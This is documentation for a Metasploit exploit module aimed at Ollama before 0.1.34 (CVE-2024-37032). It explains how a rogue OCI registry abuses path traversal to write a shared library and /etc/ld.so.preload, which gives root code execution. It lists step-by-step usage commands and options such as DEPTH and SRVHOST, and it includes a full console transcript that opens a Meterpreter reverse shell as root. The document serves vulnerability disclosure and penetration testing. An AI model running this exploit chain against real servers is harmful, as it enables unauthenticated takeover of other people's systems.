## Vulnerable Application

Ollama before 0.1.34 is vulnerable to a path traversal attack via the model
pull mechanism (CVE-2024-37032, "Probllama"). When pulling a model from an OCI
registry, the digest field in manifests is not validated - it accepts arbitrary
path traversal sequences instead of enforcing `sha256:<64hex>`. This allows a
rogue registry to write arbitrary files on the server.

This module chains the file write into full RCE by writing a malicious shared
library and `/etc/ld.so.preload`, then spawning a new process via `/api/chat`
to trigger the dynamic linker to load it. The library constructor forks, cleans
up `ld.so.preload`, and executes the payload in the child process.

The default Ollama Docker image runs as root with the API bound to
`0.0.0.0:11434`, making this a direct unauthenticated RCE.

Successfully tested against Ollama 0.1.33 on Docker.

### Install

```
docker run -d -p 11434:11434 --name ollama ollama/ollama:0.1.33
```

Verify it's running:

```
curl http://127.0.0.1:11434/api/version
{"version":"0.1.33"}
```

## Verification Steps

1. Start the vulnerable Ollama container
1. Start msfconsole
1. Do: `use exploit/linux/http/ollama_rce_cve_2024_37032`
1. Do: `set RHOSTS <target>`
1. Do: `set LHOST <attacker>`
1. Do: `set SRVHOST <attacker>`
1. Do: `run`
1. You should get a Meterpreter session as root.

## Options

### WRITABLE_DIR

Writable directory on the target for payload files. Defaults to `/tmp`.

### DEPTH

Number of `../` sequences used in the path traversal to reach the root
filesystem from Ollama's blob storage directory. Defaults to `14`, which works
for the standard Docker image. Adjust if the target uses a non-default
`OLLAMA_MODELS` path with a different directory depth.

### SRVHOST / SRVPORT

The address and port for the rogue OCI registry. `SRVHOST` must be a routable
IP reachable from the target (not `0.0.0.0`).

## Scenarios

### Ollama 0.1.33 on Docker (Linux x64)

```
msf6 > use exploit/linux/http/ollama_rce_cve_2024_37032
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set SRVHOST 172.17.0.1
SRVHOST => 172.17.0.1
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set SRVPORT 8088
SRVPORT => 8088
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > run

[*] Started reverse TCP handler on 172.17.0.1:4488
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ollama 0.1.33 (vulnerable to path traversal)
[*] Using URL: http://172.17.0.1:8088/
[*] Rogue OCI registry on 172.17.0.1:8088
[*] Pull 1: 172.17.0.1:8088/haptic-driver/model (path traversal write)
[+] Payload .so and ld.so.preload written via path traversal
[*] Pull 2: 172.17.0.1:8088/wireless-protocol/model (registering trigger model)
[+] Trigger model registered
[*] Triggering RCE via /api/chat (spawning runner process)...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.17.0.5
[+] Deleted /tmp/CEFMQeff.so
[*] Meterpreter session 1 opened (172.17.0.1:4488 -> 172.17.0.5:48630)

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 6078642134f2
OS           : Debian 12.5 (Linux 6.14.0-123037-tuxedo)
Architecture : x64
Meterpreter  : x64/linux
```
